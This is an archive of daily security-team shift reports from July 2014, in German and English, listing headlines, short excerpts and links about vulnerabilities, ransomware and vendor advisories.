30 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 29-07-2014 18:00 − Mittwoch 30-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** 22 Jump Street, Transformers Are Top Movie Lures for Summer *** --------------------------------------------- Summertime has become synonymous with blockbuster movies. Unfortunately, these movies have become a go-to social engineering lure used by cybercriminals. Just like in previous years, Trend Micro engineers searched for possible threats related to movies released during the summer. This year, 22 Jump Street was the top movie used for social .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/22-jump-street-t… *** Google Android Certificate Chain Validation Flaw Lets Applications Gain Elevated Privileges *** --------------------------------------------- The software does not properly validate an application's certificate chain. An application can supply a specially crafted application identity certificate to impersonate a privileged application and gain access to vendor-specific device administration extensions. --------------------------------------------- http://www.securitytracker.com/id/1030654 *** Erpressungs-Trojaner CTB-Locker verschlüsselt sicher und verwischt Spuren *** --------------------------------------------- Wenn man diesem Schädling zum Opfer fällt, gibt es wenig Hoffnung für die eigenen Daten. Diese sind mit State-of-the-Art-Verschlüsselung gesichert und der Trojaner kommuniziert nur verschlüsselt über das Tor-Netz mit seinen Kontrollservern. --------------------------------------------- http://www.heise.de/security/meldung/Erpressungs-Trojaner-CTB-Locker-versch… *** Symantec Endpoint Protection 0day *** --------------------------------------------- In a recent engagement, we had the opportunity to audit the Symantec Antivirus Endpoint Protection solution, where we found a multitude of vulnerabilities. Some of these made it to CERT, while others have been scheduled for review during our upcoming AWE course at Black Hat 2014, Las Vegas. Ironically, the same software that was meant to protect the organization under review was the reason for its compromise. --------------------------------------------- http://www.offensive-security.com/vulndev/symantec-endpoint-protection-0day/ *** Scan Shows Possible Heartbleed Fix Failures *** --------------------------------------------- Of more than 1,600 Global 2000 firms, only 3% of their public-facing servers have been fully and properly locked down from the Heartbleed vulnerability that was first revealed .. --------------------------------------------- http://www.darkreading.com/vulnerabilities---threats/vulnerability-manageme… *** Tor security advisory: "relay early" traffic confirmation attack *** --------------------------------------------- On July 4 2014 we found a group of relays that we assume were trying to deanonymize users. They appear to have been targeting people who operate or access Tor hidden services. The attack involved modifying Tor protocol headers to do traffic confirmation attacks. --------------------------------------------- https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-… *** Internet of Things: Kreditkartennummern und das Passwort 1234 *** --------------------------------------------- Hersteller von vernetzten Geräten gehen sorglos mit deren Sicherheit um. Kaputte Webinterfaces, überflüssige Kreditkarteninformationen und zu einfache Passwörter wie 1234 machen viele Geräte angreifbar. --------------------------------------------- http://www.golem.de/news/internet-of-things-kreditkartennummern-und-das-pas… *** Multiple vulnerabilities in Kunena Forum Extension for Joomla *** --------------------------------------------- http://www.securityfocus.com/archive/1/532933 http://www.securityfocus.com/archive/1/532932 *** Multiple vulnerabilities in SAP products *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94932 http://xforce.iss.net/xforce/xfdb/94931 http://xforce.iss.net/xforce/xfdb/94930 http://xforce.iss.net/xforce/xfdb/94922 http://xforce.iss.net/xforce/xfdb/94923 http://xforce.iss.net/xforce/xfdb/94921

1 0

Tageszusammenfassung - Dienstag 29-07-2014
by Daily end-of-shift report 29 Jul '14

29 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 28-07-2014 18:00 − Dienstag 29-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Critroni/Onion - Newest Addition to Encrypting Ransomware *** --------------------------------------------- In my last blog post about a week ago, I talked about how Cryptolocker and the like are not dead and we will continue to see more of them in action. It's a successful 'business model' and I don't see it going away anytime soon. Not even a few days after my post a new encrypting ransomware emerged. This .. --------------------------------------------- http://www.webroot.com/blog/2014/07/25/critroni-new-encrypting-ransomware/ *** Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th) *** --------------------------------------------- Our reader Robin submitted the following detect: Ive got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18453 *** Cisco Prime Data Center Network Manager Input Validation Flaw Permits Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030652 *** Hacker klauten Pläne für Israels Raketenschild "Iron Dome" *** --------------------------------------------- Bei einem Hackerangriff auf drei israelische Waffenschmieden sollen Hacker der chinesischen Regierung in den Jahren 2011 und 2012 haufenweise wichtige Daten zu dem Raketenabwehrsystem erbeutet haben. Die Angreifer sollen der Spezialeinheit 61398 angehören. --------------------------------------------- http://www.heise.de/security/meldung/Hacker-klauten-Plaene-fuer-Israels-Rak… *** Android crypto blunder exposes users to highly privileged malware *** --------------------------------------------- The majority of devices running Google's Android operating system are susceptible to hacks that allow malicious apps to bypass a key security sandbox so they can steal user credentials, read e-mail, and access payment histories and other sensitive data, researchers have warned. --------------------------------------------- http://arstechnica.com/security/2014/07/android-crypto-blunder-exposes-user… *** Changes in the Asprox Botnet *** --------------------------------------------- In this blog post, we took a quick overview of Asprox's functions and saw the updates that it has made to its C&C code. With added RSA encryption, another C&C command, and updated messaging format, it does not look like Asprox will stop evolving. We will continue to monitor Asprox for any changes and will keep you updated. --------------------------------------------- https://blog.fortinet.com/Changes-in-the-Asprox-Botnet/ *** How Cybercrime Exploits Digital Certificates *** --------------------------------------------- Security experts recognize 2011 as the worst year for certification authorities. The number of successful attacks against major companies reported during the year has no precedent, many of them had serious consequences. --------------------------------------------- http://resources.infosecinstitute.com/cybercrime-exploits-digital-certifica… *** Security: Antivirenscanner machen Rechner unsicher *** --------------------------------------------- Ein Datenexperte hat sich aktuelle Virenscanner angesehen. Viele seien durch einfache Fehler angreifbar, meint er. Da sie tief ins System eingreifen, stellen sie eine besondere Gefahr dar - obwohl sie eigentlich schützen sollen. --------------------------------------------- http://www.golem.de/news/security-antivirenscanner-machen-rechner-unsicher-… *** Elasticsearch-Lücke verwandelt Amazon-Cloud-Server in DDoS-Zombies *** --------------------------------------------- Durch eine Sicherheitslücke in einer älteren Elasticsearch-Version können Angreifer beliebigen Schadcode ausführen. Das wird momentan dazu genutzt, Server in Amazons EC2-Cloud zu kapern und für DDoS-Angriffe zu missbrauchen. --------------------------------------------- http://www.heise.de/security/meldung/Elasticsearch-Luecke-verwandelt-Amazon… *** Multiple vulnerabilities in Oxwall 1.7.0 *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070156 http://cxsecurity.com/issue/WLB-2014070155

1 0

Tageszusammenfassung - Montag 28-07-2014
by Daily end-of-shift report 28 Jul '14

28 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 25-07-2014 18:00 − Montag 28-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco WebEx Meetings Server Authenticated Encryption Vulnerability *** --------------------------------------------- A vulnerability in the user.php script of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to view sensitive information. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cacti cross-site scripting *** --------------------------------------------- Cacti is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the Full Name field to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting .. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94862 *** Cisco WebEx Meetings Server OutlookAction Class Vulnerability *** --------------------------------------------- A vulnerability in the OutlookAction Class of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to enumerate valid user accounts. The vulnerability is due to .. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco WebEx Meetings Server Web Framework Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco WebEx Meetings Server could allow an unauthenticated, remote attacker to view sensitive information. The vulnerability occurs because sensitive information is passed in a query string. An attacker could .. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Service Drains Competitors' Online Ad Budget *** --------------------------------------------- The longer one lurks in the Internet underground, the more difficult it becomes to ignore the harsh reality that for nearly every legitimate online business there is a cybercrime-oriented anti-business. Case in point: Todays post looks at a popular service that helps crooked online marketers exhaust the Google AdWords budgets of their competitors. --------------------------------------------- http://krebsonsecurity.com/2014/07/service-drains-competitors-online-ad-bud… *** Daimler: Mit eigener Hacker-Gruppe gegen Sicherheitslücken *** --------------------------------------------- Der Automobilhersteller Daimler beschäftigt eine fest angestellte Gruppe von Datenspezialisten, deren Aufgabe es ist, das eigene Firmennetzwerk zu attackieren. So sollen Sicherheitslücken schneller aufgespürt werden. --------------------------------------------- http://www.golem.de/news/daimler-mit-eigener-hacker-gruppe-gegen-sicherheit… *** Ubiquiti UbiFi Controller 2.4.5 Password Hash Disclosure *** --------------------------------------------- If remote logging is enabled on the UniFi controller, syslog messages are sent to a syslog server. Contained within the syslog messages is the admin password that is used by both the UniFi controller, and all managed Access Points. This CVE was .. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070146 *** Tails: Zero-Day im Invisible Internet Project *** --------------------------------------------- In der Linux-Distribution Tails befindet sich eine Sicherheitslücke, über die Nutzeridentitäten aufgedeckt werden können. Die Schwachstelle ist nicht in Tor, sondern im Invisible-Internet-Project-Netzwerk zu finden. --------------------------------------------- http://www.golem.de/news/tails-zero-day-im-invisible-internet-project-1407-… *** DANE disruptiv: Authentifizierte OpenPGP-Schlüssel im DNS *** --------------------------------------------- Pretty Good Privacy soll das DNS zur Schlüsselpropagierung nutzen. Auf der Liste der Entwickler der Internet Engineering Task Force (IETF) steht als nächstes die Zulassung eigenen Schlüsselmaterials. --------------------------------------------- http://www.heise.de/security/meldung/DANE-disruptiv-Authentifizierte-OpenPG… *** Behind the Android.OS.Koler distribution network *** --------------------------------------------- Android.OS.Koler.a a ransomware program that blocks the screen of an infected device and requests a ransom in order to unlock the device. An entire network of malicious porn sites linked to a traffic direction system that redirects the victim to different payloads targeting not only mobile devices but any other visitor. --------------------------------------------- https://securelist.com/blog/research/65189/behind-the-android-os-koler-dist… *** Dissecting the CVE-2013-2460 Java Exploit *** --------------------------------------------- In this vulnerability, code is able to get the references of some restricted classes which are cleverly used for privilege escalation and bypassing the JVM sandbox. The vulnerable 'invoke' method of the 'sun.tracing.ProviderSkeleton' class is used to .. --------------------------------------------- http://research.zscaler.com/2014/07/dissecting-cve-2013-2460-java-exploit.h… *** Anatomy of an iTunes phish - tips to avoid getting caught out *** --------------------------------------------- Even if youd back yourself to spot a phish every time, heres a step-by-step account that might help to save your friends and family in the future... --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/28/anatomy-of-an-itunes-phish-tips-… *** ICS 3C - ICS Cybersecurity Council Conference *** --------------------------------------------- ICS 3C gathers experts and decision makers placing Cybersecurity at the heart of a Pan-European Dialogue on solutions for securing critical processes. --------------------------------------------- http://www.anapur.de/u_e_ICS_Cybersecurity_Conference_2014_HD.htm *** Trojaner: Warnungen vor gefälschten Ikea-Mails *** --------------------------------------------- Schon mehrere tausend Funde, E-Mails sind "täuschend echt" .. --------------------------------------------- http://derstandard.at/2000003626539 *** Malware, Would You Install it for One Cent? *** --------------------------------------------- A research study report entitled It's All About The Benjamins: An empirical study on incentivizing users to ignore security .. --------------------------------------------- http://www.seculert.com/blog/2014/07/would-you-install-potential-malware-fo…

1 0

Tageszusammenfassung - Freitag 25-07-2014
by Daily end-of-shift report 25 Jul '14

25 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 24-07-2014 18:00 − Freitag 25-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** More Details of Onion/Critroni Crypto Ransomware Emerge *** --------------------------------------------- New ransomware has been dubbed Onion by researchers at Kaspersky Lab as its creators use command and control servers hidden in the Tor Network (a/k/a The Onion Router) to obscure their malicious activity. --------------------------------------------- http://threatpost.com/onion-ransomware-demands-bitcoins-uses-tor-advanced-e… *** Kali 1.0.8 released with UEFI boot support, more info at http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/, (Fri, Jul 25th) *** --------------------------------------------- -- Bojan INFIGO IS (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18443&rss *** Gefährlicher als die NSA: Firmen unterschätzen kriminelle Hacker *** --------------------------------------------- Allianz für Cyber-Sicherheit beim deutschen Bundesamt für Sicherheit in der Informationstechnik sieht größten Nachholbedarf in produzierenden Unternehmen --------------------------------------------- http://derstandard.at/2000003528513 *** TAILS Team Recommends Workarounds for Flaw in I2P *** --------------------------------------------- The developers of the TAILS operating system say that users can mitigate the severity of the critical vulnerability researchers discovered in the I2P software that's bundled with TAILS with a couple of workarounds, but there is no patch for the bug yet. The vulnerability that affects TAILS is in the I2P anonymity network software that comes... --------------------------------------------- http://threatpost.com/tails-team-recommends-workarounds-for-flaw-in-i2p/107… *** Fake GoogleBots are third most common DDoS attacker *** --------------------------------------------- An analysis of 400 million search engine visits to 10,000 sites done by Incapsula researchers has revealed details that might be interesting to web operators and SEO professionals. --------------------------------------------- http://www.net-security.org/secworld.php?id=17169 *** New SSL server rules go into effect Nov. 1 *** --------------------------------------------- Public certificate authorities (CAs) are warning that as of Nov. 1 they will reject requests for internal SSL server certificates that don't conform to new internal domain naming and IP address conventions designed to safeguard networks. --------------------------------------------- http://www.networkworld.com/article/2457649/security0/new-ssl-server-rules-… *** The App I Used to Break Into My Neighbor's Home *** --------------------------------------------- Leave your ring of cut-brass secrets unattended on your desk at work, at a bar table while you buy another round, or in a hotel room, and any stranger---or friend---can upload your keys to their online collection. --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/3cdb9908/sc/36/l/0L0Swired0N0C20A… *** Attackers abusing Internet Explorer to enumerate software and detect security products *** --------------------------------------------- During the last few years we have seen an increase on the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim's system using Internet Explorer.In this blog post we will describe some of the techniques that attackers are using to perform reconnaisance that gives them information for future attacks. We have also seen these techniques being used to decide whether or not they exploit the victim based on detected... --------------------------------------------- http://www.alienvault.com/open-threat-exchange/blog/attackers-abusing-inter… *** Building a Legal Botnet in the Cloud *** --------------------------------------------- Two researchers have built a botnet using free anonymous accounts. They only collected 1,000 accounts, but theres no reason this cant scale to much larger numbers.... --------------------------------------------- https://www.schneier.com/blog/archives/2014/07/building_a_lega.html *** Bugtraq: Security advisory for Bugzilla 4.5.5, 4.4.5, 4.2.10, and 4.0.14 *** --------------------------------------------- http://www.securityfocus.com/archive/1/532895 *** Morpho Itemiser 3 Hard-Coded Credential *** --------------------------------------------- This advisory provides vulnerability information for hard-coded credentials in the Morpho Itemiser 3. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-205-01 *** VU#394540: Sabre AirCentre Crew contains a SQL injection vulnerability *** --------------------------------------------- Vulnerability Note VU#394540 Sabre AirCentre Crew contains a SQL injection vulnerability Original Release date: 25 Jul 2014 | Last revised: 25 Jul 2014 Overview Sabre AirCentre Crew 2010.2.12.20008 and earlier contains a SQL injection vulnerability. Description CWE-89: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Sabre AirCentre Crew 2010.2.12.20008 and earlier is vulnerable to a SQL Injection attack in the username and password fields in CWPLogin.aspx. --------------------------------------------- http://www.kb.cert.org/vuls/id/394540 *** Cisco Unified Presence Server Sync Agent Vulnerability *** --------------------------------------------- CVE-2014-3328 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco WebEx Meetings Server Cross-Site Request Forgery Vulnerability *** --------------------------------------------- CVE-2014-3305 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco WebEx Meetings Server Stack Trace Vulnerability *** --------------------------------------------- CVE-2014-3301 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Donnerstag 24-07-2014
by Daily end-of-shift report 24 Jul '14

24 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 23-07-2014 18:00 − Donnerstag 24-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** ZDI-14-264: (0Day) Apple QuickTime mvhd Atom Heap Memory Corruption Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-264/ *** ZDI-14-263: (0Day) Hewlett-Packard Data Protector Cell Request Service Opcode 1091 Directory Traversal Arbitrary File Write Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-263/ *** ZDI-14-262: (0Day) Hewlett-Packard Data Protector Cell Request Service Opcode 305 Directory Traversal Arbitrary File Creation Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-262/ *** [Honeypot Alert] Wordpress XML-RPC Brute Force Scanning *** --------------------------------------------- There are news reports of new Wordpress XML-PRC brute force attacks being seen in the wild. The SANS Internet Storm Center also has a Diary entry showing similar data. We have captured similar attacks in our web honeypots so we wanted to share more data with the community. Please reference earlier blog posts we have done related to Wordpress: Wordpress XML-RPC Pingback Vulnerability Analysis Defending Wordpress Logins from Brute Force Attacks Thanks goes to my SpiderLabs Research colleague --------------------------------------------- http://blog.spiderlabs.com/2014/07/honeypot-alert-wordpress-xml-rpc-brute-f… *** Smart Grid Attack Scenarios *** --------------------------------------------- This is the third (and last) in a series of posts looking at the threats surrounding smart grids and smart meters. In the first post, we introduced smart meters, smart grids, and showed why these can pose risks. In the second post, we looked at the risks of attacks on smart meters. In this post,... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/6sRN65gV904/ *** Windows Previous Versions against ransomware, (Thu, Jul 24th) *** --------------------------------------------- One of the cool features that Microsoft actually added in Windows Vista is the ability to recover previous versions of files and folders. This is part of the VSS (Volume Shadow Copy Service) which allows automatic creation of backup copies on the system. Most users "virtually meet" this service when they are installing new software, when a restore point is created that allows a user to easily revert the operating system back to the original state, if something goes wrong. However, --------------------------------------------- https://isc.sans.edu/diary/Windows+Previous+Versions+against+ransomware/184… *** BMWs ConnectedDrive falls over, bosses blame upgrade snafu *** --------------------------------------------- Traffic flows up 20% as motorway middle lanes miraculously unclog BMWs ConnectedDrive car-to-mobe interface has suffered a UK-wide outage that may also affect customers in mainland Europe. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/24/bmw_connect… *** Dirty Dozen Spampionship - which country is spewing the most spam? *** --------------------------------------------- The World Cup may be done and dusted, but the Spampionship continues! Where did you come in our spam-sending league tables? --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/22/dirty-dozen-spampionship-which-c… *** A new generation of ransomware *** --------------------------------------------- Trojan-Ransom.Win32.Onion a highly dangerous threat and one of the most technologically advanced encryptors out there. Its developers used both proven techniques 'tested' on its predecessors and solutions that are completely new for this class of malware. The use of an unorthodox cryptographic scheme makes file decryption impossible, even if traffic is intercepted between the Trojan and the server. --------------------------------------------- https://securelist.com/analysis/publications/64608/a-new-generation-of-rans… *** Bugcrowd Releases Open Source Vulnerability Disclosure Framework *** --------------------------------------------- The problems that come from doing security research on modern Web applications and other software aren't just challenging for researchers, but also for the companies on the receiving end of their advisories. Companies unaccustomed to dealing with researchers can find themselves in a difficult position, trying to figure out the clearest path forward. To help... --------------------------------------------- http://threatpost.com/bugcrowd-releases-open-source-vulnerability-disclosur… *** SA-CONTRIB-2014-072 - Freelinking, Freelinking Case Tracker - Access bypass *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-072Project: freelinking (third-party module)Project: freelinking case tracker (third-party module)Version: 6.x, 7.xDate: 2014-July-23Security risk: CriticalExploitable from: RemoteVulnerability: Access bypassDescriptionThe freelinking and freelinking case tracker modules implement a filter for the easier creation of HTML links to other pages in the site or external sites with a wiki style format such as [[pluginname:identifier]].The module doesnt sufficiently... --------------------------------------------- https://www.drupal.org/node/2308503 *** Siemens OpenSSL Vulnerabilities (Update A) *** --------------------------------------------- This updated advisory is a follow-up to the original advisory titled ICSA-14-198-03 Siemens OpenSSL Vulnerabilities that was published July 17, 2014, on the NCCIC/ICS-CERT web site. This updated advisory provides mitigation details for vulnerabilities in the Siemens OpenSSL cryptographic software library affecting several Siemens industrial products. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-198-03A *** Sierra Wireless AirLink Raven X EV-DO Vulnerabilities (Update B) *** --------------------------------------------- This updated advisory is a follow-up to the advisory titled ICSA-14-007-01A Sierra Wireless AirLink Raven X EV-DO Multiple Vulnerabilities that was published January 16, 2014, on the NCCIC/ICS CERT web site. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-007-01B *** HPSBMU03076 rev.1 - HP Systems Insight Manager (SIM) on Linux and Windows running OpenSSL, Multiple Vulnerabilities *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Systems Insight Manager running on Linux and Windows which could be exploited remotely resulting in multiple vulnerabilities. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBMU03074 rev.1 - HP Insight Control server migration on Linux and Windows running OpenSSL, Remote Denial of Service (DoS), Code Execution, Unauthorized Access, Disclosure of Information *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Insight Control server migration running on Linux and Windows which could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Cisco TelePresence Management Interface Vulnerability *** --------------------------------------------- CVE-2014-3324 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Bugtraq: Beginners error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account *** --------------------------------------------- Beginners error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account --------------------------------------------- http://www.securityfocus.com/archive/1/532875

1 0

Tageszusammenfassung - Mittwoch 23-07-2014
by Daily end-of-shift report 23 Jul '14

23 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 22-07-2014 18:00 − Mittwoch 23-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** DDoS attacks remain up, stronger in Q2, report says *** --------------------------------------------- Prolexics second quarter DDoS report noted the proliferation of shorter attacks that ate up more bandwidth. --------------------------------------------- http://www.scmagazine.com/ddos-attacks-remain-up-stronger-in-q2-report-says… *** De-obfuscating the DOM based JavaScript obfuscation found in EK's such as Fiesta and Rig *** --------------------------------------------- There is little doubt that exploit kit (EK) developers are continuing to improve their techniques and are making exploit kits harder to detect. They have heavily leveraged obfuscation techniques for JavaScript and are utilizing browser functionality to their advantage. Recent exploit kits such as "Fiesta" and "Rig" for example, have been found to be using DOM based JavaScript obfuscation. In... --------------------------------------------- http://research.zscaler.com/2014/07/de-obfuscating-dom-based-javascript.html *** Securing the Nest Thermostat *** --------------------------------------------- A group of hackers are using a vulnerability in the Nest thermostat to secure it against Nests remote data collection.... --------------------------------------------- https://www.schneier.com/blog/archives/2014/07/securing_the_ne.html *** WordPress brute force attack via wp.getUsersBlogs, (Tue, Jul 22nd) *** --------------------------------------------- Now that the XMLRPC "pingback" DDoS problem in WordPress is increasingly under control, the crooks now seem to try brute force password guessing attacks via the "wp.getUsersBlogs" method of xmlrpc.php. ISC reader Robert sent in some logs that show a massive distributed (> 3000 source IPs) attempt at guessing passwords on his Wordpress installation. The requests look like the one shown below and are posted into xmlrpc.php. Unfortunately, the web server responds with a --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18427&rss *** New Feature: "Live" SSH Brute Force Logs and New Kippo Client, (Wed, Jul 23rd) *** --------------------------------------------- We are announcing a new feature we have been working on for a while, that will display live statistics on passwords used by SSH brute forcing bots. In addition, we also updated our script that will allow you to contribute data to this effort. Right now, we are supporting the kippo honeypot to collect data. This script will submit usernames, passwords and the IP address of the attacker to our system. To download the script see https://isc.sans.edu/clients/kippo/kippodshield.pl . The script uses --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18433&rss *** Arbeit für Admins: Apache 2.4.10 stopft Sicherheitslücken *** --------------------------------------------- Für Administratoren von Webservern, die auf Apache 2.4.x laufen, heißt es updaten. Die Apache-Entwickler haben mit der neuesten Version der Software fünf Lücken geschlossen, eine davon erlaubt das Ausführen von Schadcode aus dem Netz. --------------------------------------------- http://www.heise.de/security/meldung/Arbeit-fuer-Admins-Apache-2-4-10-stopf… *** How Thieves Can Hack and Disable Your Home Alarm System *** --------------------------------------------- When it comes to the security of the Internet of Things, a lot of the attention has focused on the dangers of the connected toaster, fridge and thermostat. But a more insidious security threat lies with devices that aren't even on the internet: wireless home alarms. Two researchers say that top-selling home alarm setups can... --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/3cc7d302/sc/15/l/0L0Swired0N0C20A… *** EU to Roll Out Cybercrime Taskforce *** --------------------------------------------- International Team Will Target Cross-Border Crime Campaigns The European Union is set to launch a trial run of an international cybercrime task force that will coordinate investigations across Europe, as well as with a handful of other countries, including Australia, Canada and the United States. --------------------------------------------- http://www.bankinfosecurity.com/eu-to-roll-out-cybercrime-taskforce-a-7093 *** The psychology of phishing *** --------------------------------------------- Phishing emails are without a doubt one of the biggest security issues consumers and businesses face today. Cybercriminals no longer send out thousands of emails at random hoping to get a handful of hits, today they create highly targeted phishing emails which are tailored to suit their recipients. --------------------------------------------- http://www.net-security.org/article.php?id=2078 *** Just Released - The Phishing Planning Kit *** --------------------------------------------- One of the biggest challenges with an effective phishing program is not the technology you use, but how you communicate and implement your phishing program. To assist you in getting the most out of your phishing program we have put together the Phishing Planning Kit. Based on the feedback and input of numerous security awareness officers, this kit... --------------------------------------------- http://www.securingthehuman.org/blog/2014/07/22/phishing-planning-kit *** Facebook Scam Leads to Nuclear Exploit Kit *** --------------------------------------------- Attackers have become more aggressive and are now using Facebook scams to lead to exploit kits so they can control a user's system. --------------------------------------------- http://www.symantec.com/connect/blogs/facebook-scam-leads-nuclear-exploit-k… *** Cisco IOS XR Software NetFlow Processing Denial of Service Vulnerability *** --------------------------------------------- CVE-2014-3322 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** SonicWALL GMS 7.2 Build 7221.1701 Cross Site Scripting *** --------------------------------------------- Topic: SonicWALL GMS 7.2 Build 7221.1701 Cross Site Scripting Risk: Low Text:I. VULNERABILITY - Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701 II. BACKGROUND ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070121 *** Barracuda Networks Spam And Virus Firewall 6.0.2 XSS *** --------------------------------------------- Topic: Barracuda Networks Spam And Virus Firewall 6.0.2 XSS Risk: Low Text:Document Title: Barracuda Networks Spam&Virus Firewall v6.0.2 (600 & Vx) - Client Side Cross Site Vulnerability Re... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014070118 *** Security Notice-Statement on the XSS Security Vulnerability in Huawei E355 *** --------------------------------------------- Jul 23, 2014 17:37 --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** SSA-214365 (Last Update 2014-07-23): Vulnerabilities in SIMATIC WinCC *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Omron NS Series HMI Vulnerabilities *** --------------------------------------------- This advisory provides mitigation details for multiple vulnerabilities in Omron Corporation's NS series human-machine interface (HMI) terminals. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-203-01 *** Honeywell FALCON XLWeb Controllers Vulnerabilities *** --------------------------------------------- This advisory was originally posted to the US-CERT secure Portal library on June 24, 2014, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for vulnerabilities in Honeywell FALCON XLWeb controllers. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-175-01 *** HPSBMU03073 rev.1 - HP Network Virtualization, Remote Execution of Code, Disclosure of Information *** --------------------------------------------- A potential security vulnerability has been identified with HP Network Vitalization. The vulnerability could be exploited remotely to allow execution of code and disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Dienstag 22-07-2014
by Daily end-of-shift report 22 Jul '14

22 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 21-07-2014 18:00 − Dienstag 22-07-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Retefe Bankentrojaner *** --------------------------------------------- Die meisten [...] Bankentrojaner basieren auf technisch betrachtet ziemlich komplexen Softwarekomponenten: Verschlüsselte Konfigurationen, Man-in-the-Browser-Funktionalität, Persistenz- und Updatemechanismen, um einige zu nennen. Im letzten halben Jahr hat sich eine gänzlich neue Variante behauptet, welche erst im Februar 2014 einen Namen erhielt: Retefe. --------------------------------------------- http://securityblog.switch.ch/2014/07/22/retefe-bankentrojaner/ *** IBM Fixes Code Execution, Cookie-Stealing Vulnerabilities in Switches *** --------------------------------------------- IBM recently patched a handful of vulnerabilities in some of its KVM switches that if exploited, could have given an attacker free reign over any system attached to it. --------------------------------------------- http://threatpost.com/ibm-fixes-code-execution-cookie-stealing-vulnerabilit… *** Mobile App Wall of Shame: CNN App for iPhone *** --------------------------------------------- The CNN App for iPhone is one of the most popular news applications available for the iPhone. At present, it is sitting at #2 in the iTunes free News app category and #165 among all free apps. Along with 